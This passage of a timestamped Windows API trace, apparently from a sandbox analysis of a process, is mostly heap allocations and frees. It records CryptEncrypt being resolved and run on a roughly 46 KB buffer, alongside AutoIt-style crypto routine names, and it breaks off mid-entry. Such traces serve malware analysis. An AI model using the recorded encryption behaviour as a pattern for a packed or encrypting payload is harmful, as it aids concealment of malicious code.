[0252.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0252.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0252.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0252.084] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0252.084] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0252.084] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0252.084] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0252.085] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0252.085] CharLowerBuffW (in: lpsz="byte[46128]", cchLength=0xb | out: lpsz="byte[46128]") returned 0xb [0252.085] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0252.089] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0252.089] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0252.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0252.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0252.089] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0252.090] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0252.090] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0252.090] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51aa8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0252.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0252.090] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0252.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0252.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0252.091] CryptEncrypt (in: hKey=0xa86f90, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f35cb8*, pdwDataLen=0x8cef60*=0xb42a, dwBufLen=0xb430 | out: pbData=0x2f35cb8*, pdwDataLen=0x8cef60*=0xb430) returned 1 [0252.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0252.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0252.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0252.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0252.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0252.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0252.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0252.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0252.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0252.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0252.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0252.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0252.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0252.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0252.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0252.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0252.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0252.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0252.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0252.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0252.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0252.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0252.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0252.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0252.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0252.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0252.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0252.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0252.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0252.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0252.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0252.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0252.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0252.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0252.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0252.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0252.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0252.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0252.095] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0252.095] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0252.095] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0252.095] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0252.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0252.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0252.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0252.095] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b28 [0252.095] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9779f8 [0252.095] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0252.095] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0252.095] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0252.095] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0252.095] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0252.095] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0252.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0252.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0252.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0252.095] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0252.095] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0252.095] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0252.095] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0252.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0252.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0252.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0252.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0252.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0252.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0252.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0252.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0252.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0252.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0252.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0252.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0252.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0252.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517d8 | out: hHeap=0x970000) returned 1 [0252.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0252.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0252.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0252.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0252.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0252.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0252.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0252.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0252.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0252.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0252.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0252.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0252.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0252.097] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0252.097] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0252.097] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0252.097] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0252.097] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0252.097] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0252.097] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0252.097] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0252.097] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0252.097] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0252.097] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0252.097] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0252.097] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0252.097] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0252.097] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51850 | out: hHeap=0x970000) returned 1 [0252.097] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0252.097] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0252.097] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0252.097] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0252.097] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0252.097] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0252.098] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0252.098] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0252.098] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0252.098] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0252.098] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0252.098] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0252.098] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0252.098] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e563c8 | out: hHeap=0x970000) returned 1 [0252.098] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e563c8 [0252.098] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0252.098] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0252.098] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0252.098] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0252.098] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0252.098] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0252.098] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0252.098] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0252.098] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0252.098] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0252.098] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0252.098] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0252.098] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77788 [0252.098] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0252.098] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0252.098] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0252.098] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0252.099] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0252.099] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0252.099] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0252.099] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0252.099] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0252.099] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0252.099] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0252.099] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0252.099] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0252.099] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e698c8 [0252.099] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977a28 [0252.099] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0252.099] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0252.099] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0252.099] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0252.099] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0252.099] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0252.099] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0252.099] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xb430) returned 0x2f410f0 [0252.099] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0252.099] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0252.099] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977a28 | out: hHeap=0x970000) returned 1 [0252.099] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0252.099] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0252.099] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0252.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0252.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0252.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0252.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0252.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0252.100] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0252.100] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xb430) returned 0x2e7f320 [0252.102] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f410f0 | out: hHeap=0x970000) returned 1 [0252.102] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0252.102] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0252.102] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0252.102] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0252.102] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0252.102] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0252.102] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0252.102] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0252.102] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a88 [0252.102] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a88 | out: hHeap=0x970000) returned 1 [0252.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0252.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0252.103] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0252.103] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0252.103] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0252.103] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0252.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0252.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0252.103] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51628 [0252.103] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0252.103] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0252.103] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e559d0 [0252.103] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0252.103] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0252.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e559d0 | out: hHeap=0x970000) returned 1 [0252.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0252.103] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51640 [0252.103] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0252.103] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0252.103] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0252.103] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0252.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0252.103] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0252.103] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0252.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0252.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0252.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0252.103] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0252.103] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e517c0 [0252.104] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0252.104] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, 